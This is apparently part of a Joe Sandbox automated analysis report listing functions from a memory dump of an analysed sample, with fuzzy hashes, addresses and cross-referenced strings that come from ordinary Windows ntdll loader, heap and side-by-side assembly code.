String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: f35c45fea60af51dbba33c45a9332d07d6b62c54d6027f405c438ea362e34889
Instruction ID: 4fc527d186f3eb273cb1a40469d15ad8a4128abd115037d73c26fe441b6c69b6
Opcode Fuzzy Hash: f35c45fea60af51dbba33c45a9332d07d6b62c54d6027f405c438ea362e34889
Instruction Fuzzy Hash: B19127B1645706EFEB21EF6C8880B6BB7A8EBD471CF840698FA416B240C7709C05C799

Function 012BEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

R, xrefs: 012BEB62
T, xrefs: 012BEB4E
LdrpResSearchResourceInsideDirectory Exit, xrefs: 012BEB6C
, xrefs: 012BF299
{, xrefs: 01314643
LdrpResSearchResourceInsideDirectory Enter, xrefs: 012BEB58

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: eac40b4c91709048483870268d44fb517e6e3941a65514dee728563ad6eba4c9
Instruction ID: 7be815b16073b3b5a2de8a4648bf37b38fdee4858d0fed2251f1e96633d307cd
Opcode Fuzzy Hash: eac40b4c91709048483870268d44fb517e6e3941a65514dee728563ad6eba4c9
Instruction Fuzzy Hash: E1A25974A2562A8FDB68CF19CD887E9BBB5BF45348F1442E9D90DA7254DB709E80CF00

Function 012E63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Delaying execution failed with status 0x%08lx, xrefs: 01324258
minkernel\ntdll\ldrinit.c, xrefs: 013240E9, 0132414B, 0132420F, 01324269
_LdrpInitialize, xrefs: 013240DF, 01324141, 01324205, 0132425F
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 013240D8
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 013241FE
Process initialization failed with status 0x%08lx, xrefs: 0132413A

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: b87e5a0fb3d5b5e4ff1bda01f60d25b98124c67657df3a34b037ce90ef1d467b
Instruction ID: e971a28ae8799b0fd7722c1f7974d00af71cf397209d40e3a8f39359d967e070
Opcode Fuzzy Hash: b87e5a0fb3d5b5e4ff1bda01f60d25b98124c67657df3a34b037ce90ef1d467b
Instruction Fuzzy Hash: FE912870B20326DBEB35EF59D849BAA7BE5FF61B18F940128E6046B6C1D7B09801C7D0

Function 012A645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 013099ED
minkernel\ntdll\ldrinit.c, xrefs: 01309A11, 01309A3A
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01309A01
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01309A2A
apphelp.dll, xrefs: 012A6496
LdrpInitShimEngine, xrefs: 013099F4, 01309A07, 01309A30

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 1001b4e2862f0abdd33d30b816242483820ce3385aa083d8ecf72790777c1b7e
Instruction ID: 8dccf0b44a7bdcf400f9e04df945a67f4f667e3d4281adb59adf7b7428cd4639
Opcode Fuzzy Hash: 1001b4e2862f0abdd33d30b816242483820ce3385aa083d8ecf72790777c1b7e
Instruction Fuzzy Hash: 1E51C4712283059FE721EF28D855BABBBE8FB84748F44091DF6899B191D730E944CB92

Function 012E2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01322178
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0132219F
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01322180
SXS: %s() passed the empty activation context, xrefs: 01322165
RtlGetAssemblyStorageRoot, xrefs: 01322160, 0132219A, 013221BA
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 013221BF

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 2e5dbe475ab4751b3c0f771ac18b4102858867c22d7a9b0226645e90219670ab
Instruction ID: a951ca01693fbe7b028c678c65217bea4d7e925a1dcd771f70cb3353f9abb500
Opcode Fuzzy Hash: 2e5dbe475ab4751b3c0f771ac18b4102858867c22d7a9b0226645e90219670ab
Instruction Fuzzy Hash: 71314B3AFA0225B7FB219A9ECC45F6B7BBCEF54A54F150059FB05AB140D270AA01C7A1

Function 012EC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 012EC6C4
Loading import redirection DLL: '%wZ', xrefs: 01328170
minkernel\ntdll\ldrinit.c, xrefs: 012EC6C3
minkernel\ntdll\ldrredirect.c, xrefs: 01328181, 013281F5
LdrpInitializeImportRedirection, xrefs: 01328177, 013281EB
Unable to build import redirection Table, Status = 0x%x, xrefs: 013281E5

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 22e33dabbd88038e2fd1707e470f3f81b850a8902883f23f72ce669a29eb88d6
Instruction ID: 2f572c093b4850336a286a435b4b14c0a9b48f97232c701a7afd886f2f1a1b5f
Opcode Fuzzy Hash: 22e33dabbd88038e2fd1707e470f3f81b850a8902883f23f72ce669a29eb88d6
Instruction Fuzzy Hash: D93102716643529FD220FF29D94AE2BBBD4AF95B14F400558F944AB291E620EC04CBA2

Function 012F096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 012F2DF0: LdrInitializeThunk.NTDLL ref: 012F2DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012F0BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012F0BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012F0D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012F0D74

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 81b8d57ec5779d0d168aaa54f679a4e02dfd7fd52cfa6899665a991caa8a8f79
Instruction ID: ceedc6ad9f92b45bc24a9245958eef96ee4fdc2490ce6749da9b93c2759c22b9
Opcode Fuzzy Hash: 81b8d57ec5779d0d168aaa54f679a4e02dfd7fd52cfa6899665a991caa8a8f79
Instruction Fuzzy Hash: 77423A71910715DFDB21CF68C881BAAB7F5FF44314F1445ADEA89AB242E770AA84CF60

Function 012EC720 Relevance: 6.4, Strings: 5, Instructions: 141COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 013282E8
H+, xrefs: 0132836A
LdrpInitializePerUserWindowsDirectory, xrefs: 013282DE
Failed to reallocate the system dirs string !, xrefs: 013282D7
H+, xrefs: 01328285, 01328365

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$H+$H+$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-3841238554
Opcode ID: 1d1470bc8f9e4ec60baa411fb2ddcaf12e599d15dc32467deea3e46ef4381a0e
Instruction ID: 8052b90a711fcacf75a2af072d80db7b36255ec5a8732da4bdeb52b480d6eb47
Opcode Fuzzy Hash: 1d1470bc8f9e4ec60baa411fb2ddcaf12e599d15dc32467deea3e46ef4381a0e
Instruction Fuzzy Hash: ED4156B11A0311ABC724EBA8DC45B6B7BECEF44754F84492AFA44D32A0EB70D800CB91

Function 012BA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

8, xrefs: 012BA3E7
LdrResFallbackLangList Enter, xrefs: 012BA3EF
6, xrefs: 012BA3F7
LdrResFallbackLangList Exit, xrefs: 012BA3FF

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 992b2a0a7b1d3094c361acab7b4d9f66cbc47c9fccb50cc68fb43bbe640a7dce
Instruction ID: d0b9231b1793a00a295dc8dbe0bd7e88a0ca7f8f6d177f03c04fa47a39e9acaa
Opcode Fuzzy Hash: 992b2a0a7b1d3094c361acab7b4d9f66cbc47c9fccb50cc68fb43bbe640a7dce
Instruction Fuzzy Hash: 45C19C70528386CFD725CF58C080BAAB7F4FF84748F04496AFA958B255E778CA49CB52

Function 012E8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 012E8422
minkernel\ntdll\ldrinit.c, xrefs: 012E8421
@, xrefs: 012E8591
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 012E855E

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: b103d6d447de880b1637d253de85be177be7fbded7c5dc01064bbfe3f31e5ea4
Instruction ID: 2b1ce1b672be739d971097a92cfbb5fd6cdb99fc0a8f4116af5958e6b784acf3
Opcode Fuzzy Hash: b103d6d447de880b1637d253de85be177be7fbded7c5dc01064bbfe3f31e5ea4
Instruction Fuzzy Hash: C7918C71568345AFDB21EF65CC45FBBBAE8FB85744F80092EFA8492191E730D904CB62

Function 012E273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 013222B6
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 013221D9, 013222B1
SXS: %s() passed the empty activation context, xrefs: 013221DE
.Local, xrefs: 012E28D8

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 0a886b20b059d2c03fa3637aacf78f68d35caf6de348443072e07f713b914f52
Instruction ID: b9a417644db869a0a2b4e5f03c79701630980519feb3334b132e5c6e203384b5
Opcode Fuzzy Hash: 0a886b20b059d2c03fa3637aacf78f68d35caf6de348443072e07f713b914f52
Instruction Fuzzy Hash: CFA1D33192022ADFDB24DF58CC88BA9B3F4BF59314F6541E9DA09A7251D7709E80CF90

Function 012B64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01311028
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01310FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0131106B
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 013110AE

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 5a5a0f0f59ae3e2dea388020e8cd9e2da860e45fd5445b4ca7c290e79377c5f6
Instruction ID: 11af9e5462a6c6df35963cd4922542b02b863befb6897c6443bec19e074aeb99
Opcode Fuzzy Hash: 5a5a0f0f59ae3e2dea388020e8cd9e2da860e45fd5445b4ca7c290e79377c5f6
Instruction Fuzzy Hash: A371D2B19143069FCB21DF18C8C5BA77FA8EF94798F440468FA488B286D774D598CBD2

Function 012D245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0131A992
LdrpDynamicShimModule, xrefs: 0131A998
minkernel\ntdll\ldrinit.c, xrefs: 0131A9A2
apphelp.dll, xrefs: 012D2462

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 834ad8caf4905c453e2e425e58ec4437534bec0d112b6ddc8f6e9a7e410054e3
Instruction ID: 77602a22a48466923308c0e2439821587d45f4a9ed9ab394ef5237311fa6c92b
Opcode Fuzzy Hash: 834ad8caf4905c453e2e425e58ec4437534bec0d112b6ddc8f6e9a7e410054e3
Instruction Fuzzy Hash: 38316B72610241EBDB359F5DC885EBABBBDFB80B08F564019E9006B249C7B09881CB80

Function 012C29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 012C3255
HEAP: , xrefs: 012C3264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 012C327D

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: f499c5ae1db5867152470813dc7a2689954d97dc7c01001aad8670455e9e2897
Instruction ID: 1e4d1a5bb40e3369cca84a891621ea5baeb0b6bdd5b74c268692af08637290e3
Opcode Fuzzy Hash: f499c5ae1db5867152470813dc7a2689954d97dc7c01001aad8670455e9e2897
Instruction Fuzzy Hash: 7792BA71A2424ADFDB25CF68C4407AEBBF1FF08B00F18865DEA49AB291D775A941CF50

Function 012C0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 013150AE
HEAP: , xrefs: 013150BD
(UCRBlock->Size >= *Size), xrefs: 013150CA

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 515699f5bffc4c863a6c33e01dd9b04240fc4935d5a7fcdb4cb81e57d7299ad4
Instruction ID: bebe9515e407232398724a2f62bd55755e02a27badab7ab1f0d902b2ca680937
Opcode Fuzzy Hash: 515699f5bffc4c863a6c33e01dd9b04240fc4935d5a7fcdb4cb81e57d7299ad4
Instruction Fuzzy Hash: A6F1E134610606DFEB29CF68C890BAAB7B5FF85B04F14826CE6169B385C774E941CB94

Function 012D6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 012D6C24
, xrefs: 0131CA51

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 61d217ede87dbb55e5cc3e3409a4a47b9ff6590f4dc4934266b7aabc184a6b61
Instruction ID: 48b0c76737cccd66d457caa7edbf22ceb2d33ba4d08c5ba44bab2b1c9aec605c
Opcode Fuzzy Hash: 61d217ede87dbb55e5cc3e3409a4a47b9ff6590f4dc4934266b7aabc184a6b61
Instruction Fuzzy Hash: F5C282716283419FE725CF28C881BABBBE5BF88758F04892DFA89C7241D774D845CB52

Function 012AA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 0130C1E4
UseFilter, xrefs: 012AA1C1
FilterFullPath, xrefs: 0130C2E6

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 8a3d55d439e51eb306f33783ce77b872742805fa6a3efc4f03fb31a028fc9dd6
Instruction ID: de1933b3e408289533602e218dcc4b68329f019adecf8becc954283d863e1a0b
Opcode Fuzzy Hash: 8a3d55d439e51eb306f33783ce77b872742805fa6a3efc4f03fb31a028fc9dd6
Instruction Fuzzy Hash: 30A16E719216299BDB32DF64CC98BEAB7B8FF44704F1141E9EA08A7250D7359E84CF50

Function 012D0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 0131A121
LdrpCheckModule, xrefs: 0131A117
Failed to allocated memory for shimmed module list, xrefs: 0131A10F

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: e51be7bee66504980b30f1c0816d177dc2c02916cfa621c38c2f1620df34fe1d
Instruction ID: b38df4c58346863e2d0d95aacc7abb64558b7c76311539dcccf6ead1deec9558
Opcode Fuzzy Hash: e51be7bee66504980b30f1c0816d177dc2c02916cfa621c38c2f1620df34fe1d
Instruction Fuzzy Hash: B071C070A10206DFDB29DF68C981BBEBBF8FB44708F58402DE506A7265E774AD41CB54

Function 012C0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01315335
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0131534D
HEAP: , xrefs: 01315342

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 330cff9acd4c841fc45021c50c10cd9e7fc2a4980bbc56f6258f37e63118a914
Instruction ID: 9bb65d895092e9bd3bc7663d80d7142c6abbdc37acb2bd14a8a5d911e0783c17
Opcode Fuzzy Hash: 330cff9acd4c841fc45021c50c10cd9e7fc2a4980bbc56f6258f37e63118a914
Instruction Fuzzy Hash: 67610374620302DFDB29CF28C441B6ABBE1FF45B08F14865DE6458F296D770E881CB94

Function 0136C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0136C1C5
@, xrefs: 0136C1F1
PreferredUILanguages, xrefs: 0136C212

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: d280ffe546f0775e325ae812f5099a7cfe1a2ef7ab8523a187cedf0e7eab04d1
Instruction ID: 0bce31f33a1ecf931af704c755b74f324d325918324b663d77835c836a2dbe78
Opcode Fuzzy Hash: d280ffe546f0775e325ae812f5099a7cfe1a2ef7ab8523a187cedf0e7eab04d1
Instruction Fuzzy Hash: 1C415371E1020EEBDF11DBD8C851FEEBBBCAB14708F14816AEA49B7254D7749A44CB50

Function 01344144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 01344160
@, xrefs: 01344225
LdrpResValidateFilePath Exit, xrefs: 01344172

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: ea5ece87cbc81205af7c3c61dd23999dd77b4b078f49b9331c6e0e5c48bc456c
Instruction ID: 563ff91ee3d5cc4b3551339f891f245c6a2d0851284a2e08caf4cb51facd21df
Opcode Fuzzy Hash: ea5ece87cbc81205af7c3c61dd23999dd77b4b078f49b9331c6e0e5c48bc456c
Instruction Fuzzy Hash: 5B411371A10648CBEB26DBE8C840BADBBF8FF55748F14046ADA01FB791DB35A901CB11

Function 01334755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpCheckRedirection, xrefs: 0133488F
minkernel\ntdll\ldrredirect.c, xrefs: 01334899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01334888

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 7912755996c7297270cb058e0cd395f0dda989b164a4c28c6d9050aea46bf402
Instruction ID: d829e9010d24cf835c7f07eb2cf5aacaa61c5165956718ae12c0173841e24429
Opcode Fuzzy Hash: 7912755996c7297270cb058e0cd395f0dda989b164a4c28c6d9050aea46bf402
Instruction Fuzzy Hash: CC41D132A142519FCB22CF2CD840A267FE8AFC9B58F050569ED599B351E332D800CB99

Function 012C0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01315449
HEAP[%wZ]: , xrefs: 01315431
HEAP: , xrefs: 0131543E

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 8e385119e05cc187f47de8e9747d58adb8ebbec11eb8bd15bf51b23435a5c208
Instruction ID: 19d78cb40d5f475ec5e10e1eb77b9e5b6174244fb06eb58a76cddfe1b5a0fa71
Opcode Fuzzy Hash: 8e385119e05cc187f47de8e9747d58adb8ebbec11eb8bd15bf51b23435a5c208
Instruction Fuzzy Hash: 9811C0353B5142DFD72DDB18C441B7AB3A8AF81B19F18821DF506DB659EB30D840C754

Function 013320DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01332104
LdrpInitializationFailure, xrefs: 013320FA
Process initialization failed with status 0x%08lx, xrefs: 013320F3

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 6bf7554ee3746c7e7b61ea1b6e88be100577174cad11e9789678c381de329bfb
Instruction ID: 0a004f25a31d5d8fbdb8be4ff64b1baee9f0d415c48c562ee74d7fe5254cfe71
Opcode Fuzzy Hash: 6bf7554ee3746c7e7b61ea1b6e88be100577174cad11e9789678c381de329bfb
Instruction Fuzzy Hash: 3BF0C235A50308BBEB24E64DCD46FAA7B6CFB80B58F500069F6007B685D2B0A900CA95

Function 012C03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01314D8A

Strings

#%u, xrefs: 01314D82

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 02a5edf2ffe0d5127822af719cf21da8ffcaf4f07dbb06b183f33966a051210f
Instruction ID: 132a94ae224523312d2af96c51e6d1befd0c00bb136911b3f2ca3ae9c92917ab
Opcode Fuzzy Hash: 02a5edf2ffe0d5127822af719cf21da8ffcaf4f07dbb06b183f33966a051210f
Instruction Fuzzy Hash: 32714971A1014A9FDB15DFA8C990BAEBBF8FF08704F144169EA05E7255EB34ED01CBA4

Function 012BA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 012BAA25
